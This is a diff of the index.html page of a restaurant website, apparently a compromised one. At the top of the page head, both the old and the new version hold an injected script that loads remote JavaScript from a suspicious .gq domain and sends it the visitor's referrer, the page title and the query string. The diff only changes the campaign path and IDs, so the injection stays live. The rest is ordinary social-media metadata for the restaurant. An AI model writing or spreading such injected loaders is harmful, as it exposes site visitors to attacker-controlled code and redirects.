--- a/index.html
+++ b/index.html
@@ -1,14 +1,15 @@
 <!DOCTYPE HTML>
 <html lang="en">
- <head><span id="a922840e-8e51-cf82-8ce0-fdbbaac57cee"></span><script type="application/javascript">
+ <head>
+<span id="d4977f06-6b39-3047-1a37-64ea0655456c"></span><script type="application/javascript">
 var d=document;var s=d.createElement('script'); 
-s.src='https://yasakeevradyi10.gq/vZsXmbzW?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec3ac862618c=script5ec3ac862618d&_cid=a922840e-8e51-cf82-8ce0-fdbbaac57cee'; 
+s.src='https://yasakeevradyi10.gq/SjS5cZvP?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec4f4eb48004=script5ec4f4eb48005&_cid=d4977f06-6b39-3047-1a37-64ea0655456c'; 
 if (document.currentScript) { 
 document.currentScript.parentNode.insertBefore(s, document.currentScript);
 } else {
 d.getElementsByTagName('head')[0].appendChild(s);
 }
-if (document.location.protocol === 'https:' && 'https://yasakeevradyi10.gq/vZsXmbzW?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec3ac862618c=script5ec3ac862618d'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+if (document.location.protocol === 'https:' && 'https://yasakeevradyi10.gq/SjS5cZvP?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec4f4eb48004=script5ec4f4eb48005'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
 </script>
 <meta name="twitter:card" content="summary"><meta name="twitter:description" content="Safi is a specialty meat and seafood restaurant in Ajman. The menu is an Asian-influenced mix of seasonal and regional fish and produce, prepared on demand according to each guest’s preferences"><meta name="twitter:image" content="https://www.safirestaurant.com/resourcefiles/homeimages/safi-seafood-restaurant-top1.jpg?version=5072020085245"><meta name="twitter:site" content="@ajmansaray"><meta name="twitter:title" content="Sea & Meat at Safi | Ajman Saray, a Luxury Collection Resort, Ajman."><meta property="og:image" content="https://www.safirestaurant.com/resourcefiles/homeimages/safi-seafood-restaurant-top1.jpg?version=5072020085245"><meta property="og:title" content="Sea & Meat at Safi | Ajman Saray, a Luxury Collection Resort, Ajman."><meta property="og:description" content="Safi is a specialty meat and seafood restaurant in Ajman. The menu is an Asian-influenced mix of seasonal and regional fish and produce, prepared on demand according to each guest’s preferences">
 
